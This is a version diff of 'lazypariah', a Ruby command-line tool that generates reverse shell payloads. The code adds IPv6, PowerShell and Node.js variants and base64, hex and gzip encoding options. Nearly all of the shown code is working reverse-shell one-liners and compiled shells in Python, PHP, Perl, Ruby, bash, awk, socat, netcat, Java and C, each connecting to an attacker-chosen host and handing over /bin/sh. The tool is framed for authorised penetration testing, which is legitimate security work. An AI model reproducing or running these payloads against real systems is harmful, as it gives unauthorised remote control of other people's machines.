lazypariah 1.2.1 → 1.6.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 58e00a13fa890edbb404bcc96212ff45ba5078c2623074726d97aef8523e9b9f
-  data.tar.gz: 9e9bd07d1c92c0eff8e109049693abcccb13d8d6e1b99f1068d99dc486f398f0
+  metadata.gz: 0e2c6b1e497a8a6f2dc4ffd408a94528e7b72e221fb757faab10ae4f5139e849
+  data.tar.gz: a50c50b1387630ca64302780e448387fcc6c3424d29f01484bd9deea5ee23699
 SHA512:
-  metadata.gz: 97ecea89386f9e7686652d9b20815ef13af5acdaa78e3b2a1bc808ac1ca0d9847ed7c922e1977b31e23cbafe923adb187eccc66c86ba6893127096c7a5b3d70b
-  data.tar.gz: c76daf729c50520dd7baa98552b2bd369dd14fc12118ad40b86c2504566bb1aad3d5687fb528292f296b9064156ad1d1a4270034b66fa3d38996e2acb88ccce7
+  metadata.gz: 45ca04176c895ef5686b1287036c3ce8b9299a92b3b7e622165246b686847e7c6a25523e893b140d5a7d6a3ebd22af1865a2ba107d21bea2641b8fa68f56d4cd
+  data.tar.gz: 3b25a2dc14255ffed550d2e89dddcb759c98031d300a75a0f0425faf94c04fbf03b79b6c8f5c2820aa4860ae771e7ba4f7fe991233b65c959e9054848110084e

data/bin/lazypariah

@@ -1,13 +1,13 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 1.2.1
+# Version: 1.6.0
 # Description:
 #	LAZYPARIAH is a simple tool for generating various reverse shell payloads
 #	on the fly. It is intended to be used only in authorised circumstances by
 #	qualified penetration testers, security researchers and red team professionals.
 #
-# Copyright (C) 2020-2021 Peter Bruce Funnell
+# Copyright (C) 2020-2022 Peter Bruce Funnell
 #
 # This program is free software: you can redistribute it and/or modify it under the terms of the GNU
 # General Public License as published by the Free Software Foundation, either version 3 of the License,
@@ -29,7 +29,7 @@ require "stringio"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "1.2.1".freeze()
+PROGRAM_VERSION = "1.6.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
@@ -38,6 +38,10 @@ PAYLOAD_LIST = [
 	"python_c",
 	"python_b64",
 	"python_hex",
+	"python_ipv6",
+	"python_ipv6_c",
+	"python_ipv6_b64",
+	"python_ipv6_hex",
 	"nc",
 	"nc_pipe",
 	"php_fd",
@@ -45,6 +49,8 @@ PAYLOAD_LIST = [
 	"php_fd_tags",
 	"php_system_python_b64",
 	"php_system_python_hex",
+	"php_system_python_ipv6_b64",
+	"php_system_python_ipv6_hex",
 	"perl",
 	"perl_c",
 	"perl_b64",
@@ -56,21 +62,16 @@ PAYLOAD_LIST = [
 	"bash_tcp",
 	"awk",
 	"socat",
-	"java_class_binary",
-	"java_class_b64",
-	"java_class_gzip_b64",
+	"java_class",
 	"c_binary",
-	"c_binary_b64",
-	"c_binary_hex",
-	"c_binary_gzip",
-	"c_binary_gzip_b64",
-	"c_binary_gzip_hex",
 	"rust_binary",
-	"rust_binary_gzip",
-	"rust_binary_b64",
-	"rust_binary_gzip_b64",
-	"rust_binary_hex",
-	"rust_binary_gzip_hex",
+	"nc_openbsd",
+	"powershell_c",
+	"powershell_b64",
+	"nodejs",
+	"nodejs_c",
+	"nodejs_b64",
+	"nodejs_hex"
 ].sort()
 
 # Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
@@ -92,13 +93,26 @@ PAYLOAD_BC_DICT = {
 	"python3_b64"=>{"payload"=>"python_b64", "pv"=>"3"},
 	"python2_b64"=>{"payload"=>"python_b64", "pv"=>"2"},
 	"python3_hex"=>{"payload"=>"python_hex", "pv"=>"3"},
-	"python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"}
+	"python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"},
+	"c_binary_b64"=>{"payload"=>"c_binary", "b64"=>true},
+	"c_binary_hex"=>{"payload"=>"c_binary", "hex"=>true},
+	"c_binary_gzip"=>{"payload"=>"c_binary", "gzip"=>true},
+	"c_binary_gzip_b64"=>{"payload"=>"c_binary", "gzip_b64"=>true},
+	"c_binary_gzip_hex"=>{"payload"=>"c_binary", "gzip_hex"=>true},
+	"rust_binary_b64"=>{"payload"=>"rust_binary", "b64"=>true},
+	"rust_binary_hex"=>{"payload"=>"rust_binary", "hex"=>true},
+	"rust_binary_gzip"=>{"payload"=>"rust_binary", "gzip"=>true},
+	"rust_binary_gzip_b64"=>{"payload"=>"rust_binary", "gzip_b64"=>true},
+	"rust_binary_gzip_hex"=>{"payload"=>"rust_binary", "gzip_hex"=>true},
+	"java_class_binary"=>{"payload"=>"java_class"},
+	"java_class_b64"=>{"payload"=>"java_class", "b64"=>true},
+	"java_class_gzip_b64"=>{"payload"=>"java_class", "gzip_b64"=>true}
 }
 
 # Define function for displaying program information.
 def prog_info(donation_info=true)
 	puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
-	puts("Copyright (C) 2020-2021 Peter Bruce Funnell")
+	puts("Copyright (C) 2020-2022 Peter Bruce Funnell")
 	if donation_info
 		puts("\nBTC Donation Address (Author): 3EdoXV1w8H7y7M9ZdpjRC7GPnX4aouy18g")
 	end
@@ -108,8 +122,8 @@ end
 option_parser = OptionParser.new do |options|
 	options.banner = "\nUsage:\t#{EXECUTABLE_NAME} [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>\n"
 	options.banner << "Note:\t<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.\n\n"
-	options.banner << "Example:\tlazypariah -u python3_b64 10.10.14.4 1555\n"
-	options.banner << "Example:\tlazypariah python2_c malicious.local 1337\n\n"
+	options.banner << "Example:\tlazypariah -u python_b64 10.10.14.4 1555\n"
+	options.banner << "Example:\tlazypariah python_c malicious.local 1337\n\n"
 	options.banner << "Valid Payloads:\n"
 	PAYLOAD_LIST.each do |p|
 		options.banner << "#{" "*4}#{p}\n"
@@ -121,7 +135,12 @@ option_parser = OptionParser.new do |options|
 	options.on("-v", "--version", "Display version information and exit.")
 	options.on("-D INTEGER", "--fd INTEGER", "Specify the file descriptor used by the target for TCP. Required for certain payloads.")
 	options.on("-P INTEGER", "--pv INTEGER", "Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.")
-	options.on("-N", "--no-new-line", "Do not append a new-line character to the end of the payload.\n\n")
+	options.on("-N", "--no-new-line", TrueClass, "Do not append a new-line character to the end of the payload.")
+	options.on("--b64", "Encode a c_binary, rust_binary or java_class payload in base-64.")
+	options.on("--hex", "Encode a c_binary, rust_binary or java_class payload in hexadecimal.")
+	options.on("--gzip", "Compress a c_binary, rust_binary or java_class payload using zlib.")
+	options.on("--gzip_b64", "Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.")
+	options.on("--gzip_hex", "Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.\n\n")
 end
 
 # Define port_check method for strings.
@@ -132,14 +151,14 @@ class String
 end
 
 # Define print_output.
-def print_output(s, url_encode=false, new_line=true)
+def print_output(s: "", url_encode: false, new_line: true)
 	if url_encode
 		print(ERB::Util.url_encode(s))
 	else
 		print(s)
 	end
 	if new_line
-		puts()
+		puts("\n")
 	end
 end
 
@@ -199,77 +218,149 @@ begin
 				exit()
 			end
 
+			# Parse encoding/compression command-line arguments for binary payloads.
+			b64_payload = arguments[:"b64"]
+			hex_payload = arguments[:"hex"]
+			gzip_payload = arguments[:"gzip"]
+			gzip_b64_payload = arguments[:"gzip_b64"]
+			gzip_hex_payload = arguments[:"gzip_hex"]
+
+			# Ensure that only one encoding/compression command-line argument can be used for binary payloads.
+			bin_cla_counter = 0
+			bin_cla_array = [b64_payload, hex_payload, gzip_payload, gzip_b64_payload, gzip_hex_payload]
+			bin_cla_array.each do |a|
+				bin_cla_counter += a ? 1 : 0
+			end
+			if bin_cla_counter > 1
+				puts("More than one encoding/compression-related command-line argument was entered. This error arises when e.g. --b64 and --gzip are both used together as separate command-line arguments. If you would like to use zlib to compress a binary payload such as c_binary or java_class and encode the result in base-64, use --gzip_b64. Only one encoding/compression-related command-line argument may be used.")
+				exit()
+			end
+
 			# Parse payload, applying aliases for backwards compatibility with versions < 1.0.0.
 			if PAYLOAD_BC_DICT.include?(ARGV[0])
 				bc_dict = PAYLOAD_BC_DICT[ARGV[0]]
 				selected_payload = bc_dict["payload"]
 				tcp_fd = bc_dict["fd"]
 				python_version = bc_dict["pv"]
+				b64_payload = bc_dict["b64"]
+				hex_payload = bc_dict["hex"]
+				gzip_payload = bc_dict["gzip"]
+				gzip_b64_payload = bc_dict["gzip_b64"]
+				gzip_hex_payload = bc_dict["gzip_hex"]
 			else
 				selected_payload = ARGV[0]
 			end
 
 			case selected_payload
 			when "python"
-				print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Python reverse shell.
+				print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6"
+				# Python IPv6 reverse shell.
+				print_output(s: "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "python_c"
-				print_output("python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Python reverse shell (intended to be run as a command from a shell session).
+				print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6_c"
+				# Python IPv6 reverse shell (intended to be run as a command from a shell session).
+				print_output(s: "python#{python_version} -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "python_b64"
+				# Base-64-encoded Python reverse shell (intended to be run as a command from a shell session).
 				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
-				print_output("echo #{code} | base64 -d | python#{python_version}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6_b64"
+				# Base-64-encoded Python IPv6 reverse shell (intended to be run as a command from a shell session).
+				code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+				print_output(s: "echo #{code} | base64 -d | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "python_hex"
+				# Hex-encoded Python reverse shell (intended to be run as a command from a shell session).
 				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | python#{python_version}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "python_ipv6_hex"
+				# Hex-encoded Python IPv6 reverse shell (intended to be run as a command from a shell session).
+				code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+				print_output(s: "echo #{code} | xxd -p -r - | python#{python_version}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "php_system_python_b64"
+				# Hybrid shell: python_b64 payload contained within a system function in a miniature PHP script.
 				python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
-				print_output("<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "php_system_python_ipv6_b64"
+				# Hybrid shell: python_ipv6_b64 payload contained within a system function in a miniature PHP script.
+				python_code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
+				print_output(s: "<?php system(\"echo #{python_code} | base64 -d | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "php_system_python_hex"
+				# Hybrid shell: python_hex payload contained within a system function in a miniature PHP script.
 				python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
-				print_output("<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "php_system_python_ipv6_hex"
+				# Hybrid shell: python_ipv6_hex payload contained within a system function in a miniature PHP script.
+				python_code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
+				print_output(s: "<?php system(\"echo #{python_code} | xxd -p -r - | python#{python_version}\"); ?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "nc"
-				print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Netcat reverse shell.
+				print_output(s: "nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "nc_pipe"
-				print_output("/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Alternative netcat reverse shell (using a pipe).
+				print_output(s: "/bin/sh | nc #{ARGV[1]} #{ARGV[2]}", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "php_fd", "php_fd_c", "php_fd_tags"
+				# PHP reverse shells targeting a particular file descriptor (FD).
 				if not tcp_fd
 					puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
 				else
 					case selected_payload
 					when "php_fd"
-						print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+						# Basic PHP reverse shell (without PHP tags).
+						print_output(s: "$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 					when "php_fd_c"
-						print_output("php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+						# Basic PHP reverse shell (intended to be run as a command from a shell session).
+						print_output(s: "php -r '$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 					when "php_fd_tags"
-						print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");?>", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+						# Basic PHP reverse shell (with PHP tags).
+						print_output(s: "<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");?>", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 					end
 				end
 			when "perl"
-				print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Perl reverse shell.
+				print_output(s: "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "perl_c"
-				print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Perl reverse shell (intended to be run as a command from a shell session).
+				print_output(s: "perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "perl_b64"
+				# Base-64-encoded Perl reverse shell (intended to be run as a command from a shell session).
 				code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
-				print_output("echo #{code} | base64 -d | perl", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "echo #{code} | base64 -d | perl", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "perl_hex"
+				# Hex-encoded Perl reverse shell (intended to be run as a command from a shell session).
 				code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "echo #{code} | xxd -p -r - | perl", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "ruby"
-				print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Ruby reverse shell.
+				print_output(s: "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "ruby_c"
-				print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Ruby reverse shell (intended to be run as a command from a shell session).
+				print_output(s: "ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "ruby_b64"
+				# Base-64-encoded Ruby reverse shell (intended to be run as a command from a shell session).
 				code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
-				print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "echo #{code} | base64 -d | ruby", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "ruby_hex"
+				# Hex-encoded Ruby reverse shell (intended to be run as a command from a shell session).
 				code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
-				print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				print_output(s: "echo #{code} | xxd -p -r - | ruby", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "bash_tcp"
-				print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Bash reverse shell.
+				print_output(s: "bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "awk"
-				print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+				# Awk reverse shell.
+				print_output(s: "awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			when "socat"
-				print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
-			when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
+				# Socat reverse shell.
+				print_output(s: "socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "nc_openbsd"
+				# Netcat (OpenBSD) reverse shell.
+				print_output(s: "rm /tmp/r; mkfifo /tmp/r; cat /tmp/r | /bin/sh -i 2>&1 | nc #{ARGV[1]} #{ARGV[2]} > /tmp/r", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "java_class"
+				# Java class reverse shells (compiled on the fly).
 				code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
 
 				temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
@@ -279,13 +370,24 @@ begin
 
 				File.open(temp_dir+"/rs.class", "r") do |f|
 					java_payload = f.read()
-					case selected_payload
-					when "java_class_binary"
-						print_output(java_payload, new_line=false)
-					when "java_class_b64"
+					if b64_payload
 						java_payload_b64 = Base64.strict_encode64(java_payload)
-						print_output(java_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
-					when "java_class_gzip_b64"
+						print_output(s: java_payload_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+					elsif hex_payload
+						# Hex-encoded java_class payload.
+						java_payload_hex = java_payload.unpack("H*")[0]
+						print_output(s: java_payload_hex, new_line: !arguments[:"no-new-line"])
+					elsif gzip_payload
+						# Zlib-compressed java_class payload.
+						sio = StringIO.new()
+						sio.binmode()
+						gz = Zlib::GzipWriter.new(sio)
+						gz.write(java_payload)
+						gz.close()
+						java_payload_gzip = sio.string
+						print_output(s: java_payload_gzip, new_line: false)
+					elsif gzip_b64_payload
+						# Zlib-compressed and base-64-encoded java_class payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
@@ -293,12 +395,26 @@ begin
 						gz.close()
 						java_payload_gzip = sio.string
 						java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
-						print_output(java_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
+						print_output(s: java_payload_gzip_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+					elsif gzip_hex_payload
+						# Zlib-compressed and hex-encoded java_class payload.
+						sio = StringIO.new()
+						sio.binmode()
+						gz = Zlib::GzipWriter.new(sio)
+						gz.write(java_payload)
+						gz.close()
+						java_payload_gzip = sio.string
+						java_payload_gzip_hex = java_payload_gzip.unpack("H*")[0]
+						print_output(s: java_payload_gzip_hex, new_line: !arguments[:"no-new-line"])
+					else
+						# Standard java_class payload.
+						print_output(s: java_payload, new_line: false)
 					end
 				end
 
 				system("rm -r #{temp_dir}")
-			when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
+			when "c_binary"
+				# C binary reverse shells (compiled on the fly).
 				code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
 
 				temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
@@ -308,24 +424,25 @@ begin
 
